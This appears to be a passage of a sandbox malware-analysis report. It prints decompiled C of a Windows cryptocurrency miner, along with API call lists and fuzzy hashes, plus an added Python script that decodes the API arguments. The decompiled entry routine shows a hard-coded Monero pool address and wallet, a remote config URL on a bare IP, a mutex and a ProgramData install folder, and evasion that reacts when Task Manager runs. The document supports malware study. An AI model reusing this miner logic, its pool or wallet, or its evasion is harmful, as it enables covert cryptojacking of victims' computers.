                                                                                                                                          							if(_t28 != 0) {
                                                                                                                                          								NtClose(); // executed
                                                                                                                                          								return 0 | _v8 == 0x00000103;   // 1 when the exit code is STILL_ACTIVE
                                                                                                                                          							} else {
                                                                                                                                          								return NtClose() | 0xffffffff; // executed   (-1: could not read the exit code)
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					L1:
                                                                                                                                          					return 0;
                                                                                                                                          				}
                                                                                                                                          			}
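                                                                                                                                          The three routines above are easiest to read once the raw argument values that the sandbox prints are turned back into named constants. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the "APIs" and "Strings" lines of E00406990, E00403B50 and E00408A50 exactly as they appear in this report, decodes the access masks, OBJECT_ATTRIBUTES fields, create disposition/options and the STILL_ACTIVE exit code with values taken from the Windows SDK headers, converts each "ref" address to an RVA using the 0x400000 image base from the Memory Dump Source line, and pulls the host:port string out of the String ID field. The host:port regular expression and the set of constants decoded are the author's own choices; nothing here reflects what E00401CE0 does.

```python
"""Decode the raw argument values printed for the NtCreateFile, NtOpenProcess and
string references of E00406990, E00403B50 and E00408A50 (added example)."""
import re

IMAGE_BASE = 0x400000        # "Offset: 00400000" in the Memory Dump Source line
FILE_GENERIC_READ = 0x120089 # READ_CONTROL|FILE_READ_DATA|FILE_READ_ATTRIBUTES|FILE_READ_EA|SYNCHRONIZE
STILL_ACTIVE = 0x103         # exit code GetExitCodeProcess reports for a running process

# Bit tables from winnt.h / ntifs.h (only the bits relevant to this report).
FILE_ACCESS = {0x1: "FILE_READ_DATA", 0x2: "FILE_WRITE_DATA", 0x4: "FILE_APPEND_DATA",
               0x8: "FILE_READ_EA", 0x10: "FILE_WRITE_EA", 0x20: "FILE_EXECUTE",
               0x80: "FILE_READ_ATTRIBUTES", 0x100: "FILE_WRITE_ATTRIBUTES",
               0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
               0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE"}
FILE_ATTRIBUTE = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {0: "FILE_SUPERSEDE", 1: "FILE_OPEN", 2: "FILE_CREATE", 3: "FILE_OPEN_IF",
                      4: "FILE_OVERWRITE", 5: "FILE_OVERWRITE_IF"}
CREATE_OPTION = {0x1: "FILE_DIRECTORY_FILE", 0x2: "FILE_WRITE_THROUGH", 0x4: "FILE_SEQUENTIAL_ONLY",
                 0x8: "FILE_NO_INTERMEDIATE_BUFFERING", 0x10: "FILE_SYNCHRONOUS_IO_ALERT",
                 0x20: "FILE_SYNCHRONOUS_IO_NONALERT", 0x40: "FILE_NON_DIRECTORY_FILE",
                 0x1000: "FILE_DELETE_ON_CLOSE"}
OBJ_ATTR = {0x2: "OBJ_INHERIT", 0x40: "OBJ_CASE_INSENSITIVE", 0x80: "OBJ_OPENIF",
            0x200: "OBJ_KERNEL_HANDLE", 0x400: "OBJ_FORCE_ACCESS_CHECK"}
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE"}

API_LINE = re.compile(r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Heuristic for a pool endpoint: dotted host name followed by a port (author's choice).
HOST_PORT = re.compile(r"^(?P<host>[a-z0-9][a-z0-9.-]+\.[a-z]{2,}):(?P<port>\d{2,5})$")

def parse_api_line(line):
    """Split one 'Api.DLL(arg,...), ref: addr' report line into typed fields.
    Arguments the sandbox rendered as text ('uh@', '?') are kept as strings."""
    m = API_LINE.search(line)
    if m is None:
        return None
    args = []
    for raw in (a.strip() for a in m["args"].split(",")):
        if not raw:
            continue
        try:
            args.append(int(raw, 16))
        except ValueError:
            args.append(raw)
    ref = int(m["ref"], 16)
    return {"api": m["api"], "dll": m["dll"], "args": args, "ref": ref, "rva": ref - IMAGE_BASE}

def decode_mask(value, table):
    """Name every known bit in value, lowest bit first; leftover bits are reported in hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"unknown:0x{rest:x}")
    return names

def decode_ntcreatefile(args):
    """NtCreateFile(FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize,
    FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength)."""
    if len(args) != 11:
        raise ValueError("NtCreateFile takes 11 arguments")
    access, fattr, share, disp, opts = args[1], args[5], args[6], args[7], args[8]
    return {"desired_access": decode_mask(access, FILE_ACCESS),
            "read_only": access == FILE_GENERIC_READ,
            "file_attributes": decode_mask(fattr, FILE_ATTRIBUTE),
            "share_access": decode_mask(share, FILE_SHARE) or ["none (exclusive)"],
            "create_disposition": CREATE_DISPOSITION.get(disp, f"0x{disp:x}"),
            "create_options": decode_mask(opts, CREATE_OPTION)}

def decode_object_attributes(length, attributes):
    """OBJECT_ATTRIBUTES as built on the stack in E00406990 and E00408A50 (Length, Attributes)."""
    return {"length_ok": length == 0x18,  # sizeof(OBJECT_ATTRIBUTES) on 32-bit Windows
            "attributes": decode_mask(attributes, OBJ_ATTR)}

def decode_ntopenprocess(args):
    """NtOpenProcess(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId)."""
    return {"desired_access": decode_mask(args[1], PROCESS_ACCESS)}

def liveness_from_exit_code(exit_code):
    """Value E00408A50 returns once GetExitCodeProcess succeeds: 1 = still running, 0 = exited."""
    return int(exit_code == STILL_ACTIVE)

def pool_endpoints(string_id_line):
    """Extract unique host:port strings from a '• String ID: a$b$c' line."""
    payload = string_id_line.partition("String ID:")[2]
    found = []
    for s in dict.fromkeys(p.strip() for p in payload.split("$")):  # dedupe, keep order
        m = HOST_PORT.match(s)
        if m:
            found.append((m["host"], int(m["port"])))
    return found

def summarize(lines):
    """Run the decoders over a list of report lines and collect the results by API name."""
    out = {}
    for line in lines:
        rec = parse_api_line(line)
        if rec is None:
            if "String ID:" in line:
                out["pool_endpoints"] = pool_endpoints(line)
            continue
        out.setdefault("rvas", {})[rec["api"]] = rec["rva"]
        if rec["api"] == "NtCreateFile":
            out["NtCreateFile"] = decode_ntcreatefile(rec["args"])
        elif rec["api"] == "NtOpenProcess":
            out["NtOpenProcess"] = decode_ntopenprocess(rec["args"])
    return out

# Lines copied verbatim from the APIs / Strings fields of the three routines in this report.
REPORT_LINES = [
    "• RtlDosPathNameToNtPathName_U.NTDLL(uh@,uh@,00000000,00000000), ref: 004069D7",
    "• NtCreateFile.NTDLL(005D2DFC,00120089,00000018,00000000,00000000,00000080,00000000,"
    "00000001,00000060,00000000,00000000), ref: 00406A2B",
    "• String ID: 0125789244697858$0125789244697858$xmr-us-east1.nanopool.org:14444",
    "• NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF",
]

if __name__ == "__main__":
    for key, value in summarize(REPORT_LINES).items():
        print(key, value)
    print("OBJECT_ATTRIBUTES", decode_object_attributes(0x18, 0x40))
```

Running it shows the NtCreateFile in E00406990 as a read-only, exclusive FILE_OPEN of an existing non-directory file, the NtOpenProcess in E00408A50 as PROCESS_QUERY_INFORMATION only (enough for GetExitCodeProcess, not for injection), and the String ID of E00403B50 as the single endpoint xmr-us-east1.nanopool.org:14444. Feeding other functions' API lines from the same report through summarize() works as long as the decoders for their APIs are added; unknown bits are never silently dropped, they come back as "unknown:0x...".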

                                                                                                                                          Instruction addresses (one per statement above): 0x00408a53 to 0x00408afb; entries shown as 0x00000000 are the goto L1 jumps

APIs
• NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF
• GetExitCodeProcess.KERNELBASE ref: 00408ACC
• NtClose.NTDLL(00000000), ref: 00408AD9
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Process$CloseCodeExitOpen
• String ID:
• API String ID: 2358878597-0
• Opcode ID: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
• Instruction ID: 1b6c16884e814be030dd65664031e946cab864b4b59cb1ac47a8a8f8596fd444
• Opcode Fuzzy Hash: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
• Instruction Fuzzy Hash: 55111F71A0120CAFDF10DFA0C9487EE7BF8AB04354F10456AE818E6280EB799B48DF95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 16%
E004068E0(intOrPtr _a4) {
	char _v12;          // UNICODE_STRING filled by the path conversion below
	long _v16;
	void* _v20;         // AllocationSize (LARGE_INTEGER)
	long _v24;
	void* _v28;         // IO_STATUS_BLOCK
	long _v32;          // OBJECT_ATTRIBUTES.SecurityQualityOfService
	long _v36;          // OBJECT_ATTRIBUTES.SecurityDescriptor
	intOrPtr _v40;      // OBJECT_ATTRIBUTES.Attributes
	char* _v44;         // OBJECT_ATTRIBUTES.ObjectName
	long _v48;          // OBJECT_ATTRIBUTES.RootDirectory
	void* _v52;         // OBJECT_ATTRIBUTES.Length
	long _t25;

	_v52 = 0;
	asm("xorps xmm0, xmm0");
	_v32 = 0;
	asm("movups [ebp-0x2c], xmm0");
	_v28 = 0;
	_v24 = 0;
	_v20 = 0;
	_v16 = 0;
	asm("movq [ebp-0x8], xmm0");
	// Indirect call through an import slot; the APIs list below resolves it to
	// RtlDosPathNameToNtPathName_U (ref 00406927): DOS path in _a4, NT path out in _v12
	*0x5d10b8(_a4, &_v12, 0, 0);
	_v52 = 0x18;        // sizeof(OBJECT_ATTRIBUTES) on 32-bit
	_v44 = &_v12;
	_v48 = 0;
	_v40 = 0x40;        // OBJ_CASE_INSENSITIVE
	_v36 = 0;
	_v32 = 0;
	// DesiredAccess 0x120089 = FILE_GENERIC_READ; FileAttributes 0x80 = FILE_ATTRIBUTE_NORMAL;
	// ShareAccess 0; CreateDisposition 1 = FILE_OPEN; CreateOptions 0x60 = FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT
	_t25 = NtCreateFile(0x5d2df8, 0x120089, &_v52, &_v28, &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
	return _t25;
}

APIs
• RtlDosPathNameToNtPathName_U.NTDLL(004068C5,004068C5,00000000,00000000), ref: 00406927
• NtCreateFile.NTDLL(005D2DF8,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 0040697B
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Path$CreateFileNameName_
• String ID: @
• API String ID: 3479931691-2766056989
• Opcode ID: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
• Instruction ID: fb5b581ab8e3c93d90c851d27248355ddc5a87700a0b749ee16a3b9d52e94ed7
• Opcode Fuzzy Hash: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
• Instruction Fuzzy Hash: FC11DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9107A2C0D7B522888F99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E00403680(signed int __edx, char _a4) {
	long _v8;
	void* _v12;         // AllocationSize (LARGE_INTEGER)
	long _v16;
	void* _v20;         // IO_STATUS_BLOCK
	long _v24;          // OBJECT_ATTRIBUTES.SecurityQualityOfService
	long _v28;          // OBJECT_ATTRIBUTES.SecurityDescriptor
	intOrPtr _v32;      // OBJECT_ATTRIBUTES.Attributes
	char* _v36;         // OBJECT_ATTRIBUTES.ObjectName
	long _v40;          // OBJECT_ATTRIBUTES.RootDirectory
	void* _v44;         // OBJECT_ATTRIBUTES.Length
	long _t20;
	void* _t21;
	void* _t22;
	signed int _t23;

	_t23 = __edx;
	asm("xorps xmm0, xmm0");
	_v24 = 0;
	asm("movups [ebp-0x24], xmm0");
	_v20 = 0;
	_v36 = &_a4;        // ObjectName points at the UNICODE_STRING passed on the stack
	_v16 = 0;
	_v12 = 0;
	_v8 = 0;
	_v44 = 0x18;        // sizeof(OBJECT_ATTRIBUTES) on 32-bit
	_v40 = 0;
	_v32 = 0x40;        // OBJ_CASE_INSENSITIVE
	_v28 = 0;
	_v24 = 0;
	// Same parameter set as E004068E0: FILE_GENERIC_READ, FILE_ATTRIBUTE_NORMAL, no sharing,
	// FILE_OPEN, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT; handle stored at 0x5d2df4
	_t20 = NtCreateFile(0x5d2df4, 0x120089, &_v44, &_v20, &_v12, 0x80, 0, 1, 0x60, 0, 0);
	_t21 = *0x5d2df4; // 0x3bc
	// The decompiler did not recover the condition of this conditional move; on the
	// untaken branch the global handle is overwritten with INVALID_HANDLE_VALUE (-1)
	_t22 = != ? _t23 | 0xffffffff : _t21;
	*0x5d2df4 = != ? _t23 | 0xffffffff : _t21;
	return _t20;
}

APIs
• NtCreateFile.NTDLL(005D2DF4,00120089,?,00000000,?,00000080,00000000,00000001,00000060,00000000,00000000), ref: 004036FE
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID: @
• API String ID: 823142352-2766056989
• Opcode ID: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
• Instruction ID: 3021d29c1a01cdcb7ce1e86a2c6713ee4fd4a7efed1c7ac6ce7211f4987aa3f7
• Opcode Fuzzy Hash: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
• Instruction Fuzzy Hash: B2015EB0D4130CABEB14DF90CD49BDEBBF9BF18304F10420AE505762C0D7B516488B98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
_entry_() {
	struct _SECURITY_ATTRIBUTES* _v8;
	struct _SECURITY_ATTRIBUTES* _v12;
	intOrPtr _v16;
	char _v20;
	int _v24;
	struct _SECURITY_ATTRIBUTES* _v28;
	long _v32;
	long _v36;
	char _v38;
	short _v40;
	char _v48;
	char _v72;
	char _v592;
	char _v1112;
	char _v2136;
	char _v3160;
	void _v7224;
	long _t56;
	signed int _t61;
	void* _t65;
	long _t66;
	void* _t72;
	void* _t74;
	void* _t75;
	void* _t76;
	void* _t77;
	int _t80;
	void* _t82;
	void* _t84;
	void* _t89;
	void* _t90;
	void* _t91;
	intOrPtr _t93;
	void* _t94;
	long _t96;
	long _t99;
	void* _t102;
	char _t110;
	char _t114;
	char _t117;
	char _t119;
	short _t120;
	void* _t125;
	void* _t137;
                                                                                                                                          				void* _t139;
                                                                                                                                          				void* _t140;
                                                                                                                                          				void* _t145;
                                                                                                                                          				signed int _t148;
                                                                                                                                          				char _t150;
                                                                                                                                          				void* _t153;
                                                                                                                                          				void* _t158;
                                                                                                                                          				intOrPtr _t160;
                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t161;
                                                                                                                                          				void* _t166;
                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t168;
                                                                                                                                          				intOrPtr _t169;
                                                                                                                                          				void* _t171;
                                                                                                                                          				void* _t174;
                                                                                                                                          				void* _t175;
                                                                                                                                          				void* _t176;
                                                                                                                                          				void* _t177;
                                                                                                                                          				void* _t178;
                                                                                                                                          				void* _t179;
                                                                                                                                          				void* _t180;
                                                                                                                                          				void* _t181;
                                                                                                                                          				void* _t182;
                                                                                                                                          				void* _t183;
                                                                                                                                          				void* _t185;
                                                                                                                                          				void* _t186;
                                                                                                                                          				void* _t187;
                                                                                                                                          				void* _t188;
                                                                                                                                          				void* _t189;
                                                                                                                                          				void* _t196;
                                                                                                                                          				void* _t223;
                                                                                                                                          				void* _t224;
                                                                                                                                          				void* _t225;
                                                                                                                                          				void* _t226;
                                                                                                                                          				void* _t234;
                                                                                                                                          
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_t56 = GetTickCount();
                                                                                                                                          				_t150 = 0;
                                                                                                                                          				_v32 = _t56;
                                                                                                                                          				_v36 = _t56;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				 *0x5d2df4 = 0;
                                                                                                                                          				E00401670("xmr-us-east1.nanopool.org:14444", 0, 0xcc8);
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				asm("movq [ebp-0x10], xmm0");
                                                                                                                                          				E00401BB0( &_v7224, 0, 0xfe0);
                                                                                                                                          				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  &_v7224, 0x3f8 << 2);
                                                                                                                                          				_t152 = 0;
                                                                                                                                          				_t61 = SetErrorMode(2); // executed
                                                                                                                                          				SetErrorMode(_t61 | 0x00000002); // executed
                                                                                                                                          				E004017E0("e9c1286a28d82a2d0ee6", "e9c1286a28d82a2d0ee6");
                                                                                                                                          				_t174 = _t171 + 0x2c;
                                                                                                                                          				_t65 = CreateMutexA(0, 0, "e9c1286a28d82a2d0ee6"); // executed
                                                                                                                                          				if(_t65 == 0) {
                                                                                                                                          					ExitProcess(0x1e);
                                                                                                                                          				}
                                                                                                                                          				_t158 = GetLastError;
                                                                                                                                          				_t66 = GetLastError();
                                                                                                                                          				_t191 = _t66 - 0xb7;
                                                                                                                                          				if(_t66 == 0xb7) {
                                                                                                                                          					ExitProcess(0x1f);
                                                                                                                                          				}
                                                                                                                                          				E00403220(0, SetErrorMode, _t191);
                                                                                                                                          				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
                                                                                                                                          				if(_t166 != 0 && _v24 > 1) {
                                                                                                                                          					_t148 = E004019C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
                                                                                                                                          					_t174 = _t174 + 8;
                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                          					 *0x5d1bb8 =  *0x5d1bb8 &  ~_t148;
                                                                                                                                          				}
                                                                                                                                          				LocalFree(_t166);
                                                                                                                                          				_t72 = E00401000(_t152, _t158, _t166,  *0x5d1314); // executed
                                                                                                                                          				_t175 = _t174 + 4;
                                                                                                                                          				_t195 = _t72;
                                                                                                                                          				if(_t72 != 0) {
                                                                                                                                          					E00408070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a"); // executed
                                                                                                                                          					_t176 = _t175 + 4;
                                                                                                                                          					_t196 =  *0x5d1bc0 - _t150; // 0x0
                                                                                                                                          					if(_t196 != 0) {
                                                                                                                                          						E004017E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
                                                                                                                                          						_t176 = _t176 + 8;
                                                                                                                                          					}
                                                                                                                                          					_t74 = E00401600("LKBNMTFJgl", "LKBNMTFJgl");
                                                                                                                                          					_t177 = _t176 + 8;
                                                                                                                                          					if(_t74 != 0) {
                                                                                                                                          						_t75 = E00401600("csrss.exe", "csrss.exe");
                                                                                                                                          						_t178 = _t177 + 8;
                                                                                                                                          						if(_t75 != 0) {
                                                                                                                                          							_t76 = E00401600("viTRMUuKeV", "viTRMUuKeV");
                                                                                                                                          							_t179 = _t178 + 8;
                                                                                                                                          							if(_t76 != 0) {
                                                                                                                                          								_t77 = E00407FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x40aae0, 0x23); // executed
                                                                                                                                          								_t180 = _t179 + 0xc;
                                                                                                                                          								if(_t77 != 0) {
                                                                                                                                          									E00401970("C:\ProgramData\LKBNMTFJgl", "\\");
                                                                                                                                          									E00401970("C:\ProgramData\LKBNMTFJgl", "LKBNMTFJgl");
                                                                                                                                          									_t181 = _t180 + 0x10;
                                                                                                                                          									_t80 = CreateDirectoryW("C:\ProgramData\LKBNMTFJgl", 0); // executed
                                                                                                                                          									if(_t80 != 0 || GetLastError() == 0xb7) {
                                                                                                                                          										if(E00408DD0() != 0 &&  *0x5d210c == 1) {
                                                                                                                                          											_t145 = CreateThread(0, 0, E00408450, 0, 0, 0); // executed
                                                                                                                                          											 *0x5d211c = _t145;
                                                                                                                                          										}
                                                                                                                                          										_t82 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                                                          										_t182 = _t181 + 8;
                                                                                                                                          										if(_t82 == 0) {
                                                                                                                                          											L33:
                                                                                                                                          											_t84 = E00403150( &_v1112); // executed
                                                                                                                                          											_t183 = _t182 + 4;
                                                                                                                                          											if(_t84 != 0) {
                                                                                                                                          												E004030B0( &_v1112,  &_v2136,  &_v3160);
                                                                                                                                          												__imp__SetThreadExecutionState(0x80000041, 0);
                                                                                                                                          												_t89 = E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
                                                                                                                                          												_t185 = _t183 + 0x24;
                                                                                                                                          												if(_t89 == 0) {
                                                                                                                                          													L91:
                                                                                                                                          													ExitProcess(0x3d);
                                                                                                                                          												}
                                                                                                                                          												_t90 = E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
                                                                                                                                          												_t186 = _t185 + 0x14;
                                                                                                                                          												if(_t90 == 0) {
                                                                                                                                          													goto L91;
                                                                                                                                          												}
                                                                                                                                          												L38:
                                                                                                                                          												while(1) {
                                                                                                                                          													if( *0x5d1300 != 0) {
                                                                                                                                          														_t169 = _v28;
                                                                                                                                          														if(_t169 == 0) {
                                                                                                                                          															_t96 = GetTickCount();
                                                                                                                                          															_t215 = _t96 - _v36 - 0x4e20;
                                                                                                                                          															if(_t96 - _v36 > 0x4e20) {
                                                                                                                                          																E004065D0(_t215); // executed
                                                                                                                                          																_t170 =  !=  ? 1 : _t169;
                                                                                                                                          																_v28 =  !=  ? 1 : _t169;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          													if( *0x5d1308 == 3) {
                                                                                                                                          														_t160 =  *0x5d1310; // 0x7530
                                                                                                                                          														_t161 = _t160 + 1;
                                                                                                                                          														__eflags = _t161;
                                                                                                                                          													} else {
                                                                                                                                          														_t161 = E00408040();
                                                                                                                                          													}
                                                                                                                                          													_t91 = E00408A50(_t150); // executed
                                                                                                                                          													_t187 = _t186 + 4;
                                                                                                                                          													_t168 =  ==  ? 1 : _t91;
                                                                                                                                          													if( *0x5d1304 == 0) {
                                                                                                                                          														_t93 = _v12;
                                                                                                                                          													} else {
                                                                                                                                          														_t93 = E00407EF0("taskmgr.exe"); // executed
                                                                                                                                          														_t187 = _t187 + 4;
                                                                                                                                          														_v12 = _t93;
                                                                                                                                          													}
                                                                                                                                          													if(_t150 == 0 || _t168 == 0) {
                                                                                                                                          														if(_t93 != 0) {
                                                                                                                                          															goto L58;
                                                                                                                                          														}
                                                                                                                                          														_t223 =  *0x5d1320 - _t93; // 0x0
                                                                                                                                          														if(_t223 != 0) {
                                                                                                                                          															goto L58;
                                                                                                                                          														}
                                                                                                                                          														_t224 =  *0x5d2110 - _t93; // 0x0
                                                                                                                                          														if(_t224 != 0) {
                                                                                                                                          															goto L58;
                                                                                                                                          														}
                                                                                                                                          														_t225 = _t161 -  *0x5d1310; // 0x7530
                                                                                                                                          														if(_t225 <= 0) {
                                                                                                                                          															__eflags =  *0x5d1308;
                                                                                                                                          															if( *0x5d1308 != 0) {
                                                                                                                                          																_t117 = E00403050(_t150, _t152,  &_v2136, 0); // executed
                                                                                                                                          																_t187 = _t187 + 8;
                                                                                                                                          																_t150 = _t117;
                                                                                                                                          																_t168 = 1;
                                                                                                                                          															}
                                                                                                                                          															_v8 = 0;
                                                                                                                                          															goto L68;
                                                                                                                                          														}
                                                                                                                                          														_t119 = E00403050(_t150, _t152,  &_v3160, _t93);
                                                                                                                                          														_t187 = _t187 + 8;
                                                                                                                                          														_v8 = 1;
                                                                                                                                          														_t150 = _t119;
                                                                                                                                          														_t168 = 1;
                                                                                                                                          														goto L59;
                                                                                                                                          													} else {
                                                                                                                                          														L58:
                                                                                                                                          														__eflags = _v8;
                                                                                                                                          														if(_v8 == 0) {
                                                                                                                                          															L68:
                                                                                                                                          															_t234 = _t161 -  *0x5d1310; // 0x7530
                                                                                                                                          															if(_t234 <= 0) {
                                                                                                                                          																L75:
                                                                                                                                          																__eflags = _v12;
                                                                                                                                          																if(_v12 == 0) {
                                                                                                                                          																	L77:
                                                                                                                                          																	if( *0x5d1320 == 0) {
                                                                                                                                          																		L79:
                                                                                                                                          																		if( *0x5d2110 == 0) {
                                                                                                                                          																			L82:
                                                                                                                                          																			_t94 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                                                          																			_t186 = _t187 + 8;
                                                                                                                                          																			if(_t94 != 0) {
                                                                                                                                          																				_t99 = GetTickCount();
                                                                                                                                          																				_t152 =  *0x5d1bb4 * 0xea60;
                                                                                                                                          																				_t245 = _t99 - _v32 -  *0x5d1bb4 * 0xea60;
                                                                                                                                          																				if(_t99 - _v32 >  *0x5d1bb4 * 0xea60) {
                                                                                                                                          																					_v32 = GetTickCount();
                                                                                                                                          																					_t102 = E00404DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", _t150, _t168);
                                                                                                                                          																					_t186 = _t186 + 0x14;
                                                                                                                                          																					if(_t102 != 0) {
                                                                                                                                          																						if(E004039B0(_t153) != 0) {
                                                                                                                                          																							if(_t168 != 0) {
                                                                                                                                          																								E00408730(_t150);
                                                                                                                                          																								_t186 = _t186 + 4;
                                                                                                                                          																							}
                                                                                                                                          																							E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
                                                                                                                                          																							E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
                                                                                                                                          																							_t186 = _t186 + 0x28;
                                                                                                                                          																						}
                                                                                                                                          																						E00403B50(_t153, _v20, _v16);
                                                                                                                                          																						_t186 = _t186 + 8;
                                                                                                                                          																					}
                                                                                                                                          																				}
                                                                                                                                          																			}
                                                                                                                                          																			Sleep(0xfa0); // executed
                                                                                                                                          																			continue;
                                                                                                                                          																		}
                                                                                                                                          																		L80:
                                                                                                                                          																		if(_t168 == 0) {
                                                                                                                                          																			goto L82;
                                                                                                                                          																		}
                                                                                                                                          																		L81:
                                                                                                                                          																		E00408730(_t150);
                                                                                                                                          																		_t187 = _t187 + 4;
                                                                                                                                          																		_t168 = 0;
                                                                                                                                          																		goto L82;
                                                                                                                                          																	}
                                                                                                                                          																	L78:
                                                                                                                                          																	if(_t168 != 0) {
                                                                                                                                          																		goto L81;
                                                                                                                                          																	}
                                                                                                                                          																	goto L79;
                                                                                                                                          																}
                                                                                                                                          																L76:
                                                                                                                                          																__eflags = _t168;
                                                                                                                                          																if(_t168 != 0) {
                                                                                                                                          																	goto L81;
                                                                                                                                          																}
                                                                                                                                          																goto L77;
                                                                                                                                          															}
                                                                                                                                          															if(_v12 != 0) {
                                                                                                                                          																goto L76;
                                                                                                                                          															}
                                                                                                                                          															if( *0x5d1320 != 0) {
                                                                                                                                          																goto L78;
                                                                                                                                          															}
                                                                                                                                          															if( *0x5d2110 != 0) {
                                                                                                                                          																goto L80;
                                                                                                                                          															}
                                                                                                                                          															if(_t168 != 0) {
                                                                                                                                          																E00408730(_t150);
                                                                                                                                          																_t187 = _t187 + 4;
                                                                                                                                          															}
                                                                                                                                          															_t110 = E00403050(_t150, _t152,  &_v3160, 0);
                                                                                                                                          															_t187 = _t187 + 8;
                                                                                                                                          															_v8 = 1;
                                                                                                                                          															_t150 = _t110;
                                                                                                                                          															_t168 = 1;
                                                                                                                                          															goto L77;
                                                                                                                                          														}
                                                                                                                                          														L59:
                                                                                                                                          														_t226 = _t161 -  *0x5d1310; // 0x7530
                                                                                                                                          														if(_t226 > 0) {
                                                                                                                                          															goto L75;
                                                                                                                                          														}
                                                                                                                                          														if(_v12 != 0) {
                                                                                                                                          															goto L76;
                                                                                                                                          														}
                                                                                                                                          														if( *0x5d1320 != 0) {
                                                                                                                                          															goto L78;
                                                                                                                                          														}
